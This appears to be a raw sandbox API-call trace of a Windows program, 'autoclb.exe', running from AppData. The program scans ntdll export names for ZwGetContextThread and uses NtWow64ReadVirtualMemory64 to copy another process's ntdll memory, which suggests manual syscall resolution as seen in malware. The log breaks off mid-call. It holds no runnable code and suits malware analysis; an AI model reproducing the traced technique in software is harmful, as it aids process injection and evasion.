lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwGetContextThread") returned -1 [0206.756] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwGetContextThread") returned -1 [0206.757] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="MD4Final", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="MD4Init", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="MD4Update", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="MD5Final", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="MD5Init", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="MD5Update", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwGetContextThread") returned -1 [0206.758] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwGetContextThread") returned -1 [0206.759] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtClose", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwGetContextThread") returned -1 [0206.760] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwGetContextThread") returned -1 [0206.761] VirtualFree (lpAddress=0x2720000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.768] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.768] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0206.769] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf414, ProcessInformationLength=0x30, ReturnLength=0x1eaf468 | out: ProcessInformation64=0x1eaf414, ReturnLength=0x1eaf468) returned 0x0 [0206.769] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0206.769] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.769] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0206.769] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf414, ProcessInformationLength=0x30, ReturnLength=0x1eaf468 | out: ProcessInformation64=0x1eaf414, ReturnLength=0x1eaf468) returned 0x0 [0206.769] StrRChrA (lpStart="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpEnd=0x0, wMatch=0x5c) returned="\\autoclb.exe" [0206.769] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0206.769] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0206.769] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0206.769] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0206.769] lstrcmpiA (lpString1="autoclb.exe", lpString2="NTDLL.DLL") returned -1 [0206.769] StrChrA (lpStart="autoclb.exe", wMatch=0x2e) returned=".exe" [0206.769] lstrcmpiA (lpString1="autoclb", lpString2="NTDLL.DLL") returned -1 [0206.769] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0206.769] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.770] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2720000 [0206.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f30000, Buffer=0x7ff9, BufferSize=0x2720000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f31000, Buffer=0x7ff9, BufferSize=0x2721000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f32000, Buffer=0x7ff9, BufferSize=0x2722000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f33000, Buffer=0x7ff9, BufferSize=0x2723000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f34000, Buffer=0x7ff9, BufferSize=0x2724000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f35000, Buffer=0x7ff9, BufferSize=0x2725000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f36000, Buffer=0x7ff9, BufferSize=0x2726000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f37000, Buffer=0x7ff9, BufferSize=0x2727000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f38000, Buffer=0x7ff9, BufferSize=0x2728000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f39000, Buffer=0x7ff9, BufferSize=0x2729000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3a000, Buffer=0x7ff9, BufferSize=0x272a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3b000, Buffer=0x7ff9, BufferSize=0x272b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3c000, Buffer=0x7ff9, BufferSize=0x272c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3d000, Buffer=0x7ff9, BufferSize=0x272d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3e000, Buffer=0x7ff9, BufferSize=0x272e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3f000, Buffer=0x7ff9, BufferSize=0x272f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f40000, Buffer=0x7ff9, BufferSize=0x2730000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f41000, Buffer=0x7ff9, BufferSize=0x2731000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f42000, Buffer=0x7ff9, BufferSize=0x2732000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f43000, Buffer=0x7ff9, BufferSize=0x2733000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f44000, Buffer=0x7ff9, BufferSize=0x2734000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f45000, Buffer=0x7ff9, BufferSize=0x2735000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f46000, Buffer=0x7ff9, BufferSize=0x2736000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f47000, Buffer=0x7ff9, BufferSize=0x2737000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f48000, Buffer=0x7ff9, BufferSize=0x2738000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f49000, Buffer=0x7ff9, BufferSize=0x2739000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4a000, Buffer=0x7ff9, BufferSize=0x273a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4b000, Buffer=0x7ff9, BufferSize=0x273b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4c000, Buffer=0x7ff9, BufferSize=0x273c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4d000, Buffer=0x7ff9, BufferSize=0x273d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4e000, Buffer=0x7ff9, BufferSize=0x273e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4f000, Buffer=0x7ff9, BufferSize=0x273f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f50000, Buffer=0x7ff9, BufferSize=0x2740000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f51000, Buffer=0x7ff9, BufferSize=0x2741000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f52000, Buffer=0x7ff9, BufferSize=0x2742000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f53000, Buffer=0x7ff9, BufferSize=0x2743000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f54000, Buffer=0x7ff9, BufferSize=0x2744000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f55000, Buffer=0x7ff9, BufferSize=0x2745000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f56000, Buffer=0x7ff9, BufferSize=0x2746000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f57000, Buffer=0x7ff9, BufferSize=0x2747000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f58000, Buffer=0x7ff9, BufferSize=0x2748000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f59000, Buffer=0x7ff9, BufferSize=0x2749000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5a000, Buffer=0x7ff9, BufferSize=0x274a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.774] NtWow64ReadVirtualMemory64 